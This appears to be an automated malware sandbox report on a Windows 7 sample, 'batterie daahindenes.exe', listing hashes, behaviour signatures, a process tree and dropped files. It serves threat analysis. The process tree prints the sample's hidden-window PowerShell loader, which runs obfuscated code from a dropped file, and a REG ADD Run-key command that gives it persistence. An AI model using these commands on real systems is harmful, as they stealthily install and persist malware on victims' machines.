Resubmissions

09-07-2024 08:24

240709-kayyraxdja 10

09-07-2024 08:05

240709-jy18catfpk 8

09-07-2024 08:03

240709-jxzywstfln 10

09-07-2024 07:56

240709-js4raawenc 10

09-07-2024 07:46

240709-jl1faatarm 10

09-07-2024 07:38

240709-jgh1fawajg 8

Analysis

  • max time kernel
    597s
  • max time network
    493s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
  • submitted
    09-07-2024 08:05

General

  • Target

    batterie daahindenes.exe

  • Size

    398KB

  • MD5

    b1c35e78f5d588430c4f534479def9f2

  • SHA1

    f787dd3327ca04361935f74867f76f16821db99f

  • SHA256

    4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7

  • SHA512

    5f78e6794ae313f5ca96c33fe0ecf0c882a18a93caa54bf92823ac42c5c753b6a98d4c77618de2b62cbc9d24e6e500272e4ffa7b25afff20b7e8349fc278a66c

  • SSDEEP

    12288:9GkmNVhJhqnfP30YhNia+nv4tQD3W/P19QY:9GkmPh7qfPrsQeD3W/bd

Malware Config

Signatures

  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 2 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with its display window hidden.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 10 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs regedit.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\batterie daahindenes.exe
    "C:\Users\Admin\AppData\Local\Temp\batterie daahindenes.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3032
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Vangede=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Reexpression.Tid';$Spondylotomy=$Vangede.SubString(70479,3);.$Spondylotomy($Vangede)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2432
      • C:\Program Files (x86)\windows mail\wab.exe
        "C:\Program Files (x86)\windows mail\wab.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of WriteProcessMemory
        PID:2008
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ortyginae" /t REG_EXPAND_SZ /d "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\Audiometeret\').Rudolph;%Monopolizables% ($masturbated)"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2544
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ortyginae" /t REG_EXPAND_SZ /d "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\Audiometeret\').Rudolph;%Monopolizables% ($masturbated)"
            5⤵
            • Adds Run key to start application
            • Modifies registry key
            PID:2616
  • C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe"
    1⤵
    PID:2708
  • C:\Windows\regedit.exe
    "C:\Windows\regedit.exe"
    1⤵
    • Runs regedit.exe
    • Suspicious behavior: GetForegroundWindowSpam
    PID:2936
  • C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
    "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1096
    • C:\Windows\system32\wermgr.exe
      "C:\Windows\system32\wermgr.exe" "-outproc" "1096" "880"
      2⤵
      PID:1580
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:284
    • C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
      "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3032
      • C:\Windows\system32\wermgr.exe
        "C:\Windows\system32\wermgr.exe" "-outproc" "3032" "880"
        3⤵
        PID:2600
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x598
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2268
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2848
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:2580

Network

MITRE ATT&CK Enterprise v15

Downloads

        • C:\Users\Admin\AppData\Local\Temp\OutofProcReport259902064.txt

          Filesize

          1KB

          MD5

          52adb0f7ab38f06d59f3358e8a351803

          SHA1

          5ec15aaa48cbd2a852cbf5c27831bef97e22b11f

          SHA256

          bb9e8f95f27c2a26414412144046980f618f5b6bbb76dfd6376990429b087bce

          SHA512

          0e50950cee99d8676e16021415b8bbf5dc9c29ec622e9b747c479dcad0854948475dd452c588297464d0a16841192e2b4227fc6bcc5c55e59cda716bb2275b49

        • C:\Users\Admin\AppData\Local\Temp\OutofProcReport259948958.txt

          Filesize

          1KB

          MD5

          7f2449903a1c386d4d33278b8c03da5e

          SHA1

          6e103c0d1d028398d18470019f2f3c601f38cd26

          SHA256

          565ee83bc2fd2271c034e558b6b64d646157b67920da2cb2cfa2f984a19700ae

          SHA512

          15e6cc8dc8e7743df55ae8d7dbaa72f48cd26aab4f479f3b3389fe50508a36b3213a4d77e878473fd30fb967e9265550b1fc95d00c2d548646750b6de8653314

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          6KB

          MD5

          490919770ce4bf4f08ea6e727cd9d569

          SHA1

          7a8b6fe38a3a4f43caa1acc7b12284b79422325f

          SHA256

          f2da85200b8d5197a93363a1f003b6436ae48fbdcd40bb4a00c49b9af23d4936

          SHA512

          abee1c24e472e1d77d37ce344889d3baf790645f15301fbd9518603357ab7fb43d64fc6381c9cbd3fe25da0e4c351fc3a5ecd4a71fe774e80681e0c8687daab0

        • C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Boomless.Fag

          Filesize

          344KB

          MD5

          1a78d0f226d0db154812e61b8cadb4b8

          SHA1

          e76650e32ed8bc1e3d72dde1aa6566ff031e0c6e

          SHA256

          19997e372b58bcd5bacd8b199b1633307f0c89fc3ce7abfd4087ec739742f78e

          SHA512

          b06759e8bfeb73187c5277aaaa9c6489f51a88f42b461ec0775de6741f6b797dc3c2cbb8f6cf79815078a420a26cde9cedd861c4d16ac73a037e2160efc4ec41

        • C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Reexpression.Tid

          Filesize

          68KB

          MD5

          d89dac6d6bcfb431c31bdf7d21f48fbd

          SHA1

          2f55f2b77da6a9078c7bb90fd87b205c9c4cf3b9

          SHA256

          ffeacf6c0a98133600a0f1de25732fb4b22b06af6921edd316e52a6d7837359b

          SHA512

          76eb9025c18fd7661cb72d47c7eda57a45304594e5aea32fe73b1dd94ec9db81753726f83e6d9f82924c3b9295eef4725dbaa7d633963ac8e8e91b7444346070

        • C:\Users\Admin\explorer.exe

          Filesize

          2.7MB

          MD5

          ac4c51eb24aa95b77f705ab159189e24

          SHA1

          4583daf9442880204730fb2c8a060430640494b1

          SHA256

          6a671b92a69755de6fd063fcbe4ba926d83b49f78c42dbaeed8cdb6bbc57576a

          SHA512

          011bfe19bd15dcc0f9850575e20d7f2c01160ec98ba461ad59a51b9417049e6475648b9056990247699624b080cf609ec7b5409231cfb46a012d723f7db08d81

        • memory/1096-46-0x000000001B7E0000-0x000000001BAC2000-memory.dmp

          Filesize

          2.9MB

        • memory/1096-47-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

          Filesize

          32KB

        • memory/2432-22-0x0000000073DE0000-0x000000007438B000-memory.dmp

          Filesize

          5.7MB

        • memory/2432-21-0x00000000067F0000-0x000000000938E000-memory.dmp

          Filesize

          43.6MB

        • memory/2432-11-0x0000000073DE1000-0x0000000073DE2000-memory.dmp

          Filesize

          4KB

        • memory/2432-20-0x0000000073DE0000-0x000000007438B000-memory.dmp

          Filesize

          5.7MB

        • memory/2432-18-0x0000000073DE0000-0x000000007438B000-memory.dmp

          Filesize

          5.7MB

        • memory/2432-15-0x0000000073DE0000-0x000000007438B000-memory.dmp

          Filesize

          5.7MB

        • memory/2432-13-0x0000000073DE0000-0x000000007438B000-memory.dmp

          Filesize

          5.7MB

        • memory/2432-14-0x0000000073DE0000-0x000000007438B000-memory.dmp

          Filesize

          5.7MB

        • memory/2432-12-0x0000000073DE0000-0x000000007438B000-memory.dmp

          Filesize

          5.7MB

        • memory/2580-63-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/2580-64-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/3032-56-0x000000001B550000-0x000000001B832000-memory.dmp

          Filesize

          2.9MB

        • memory/3032-57-0x0000000001DD0000-0x0000000001DD8000-memory.dmp

          Filesize

          32KB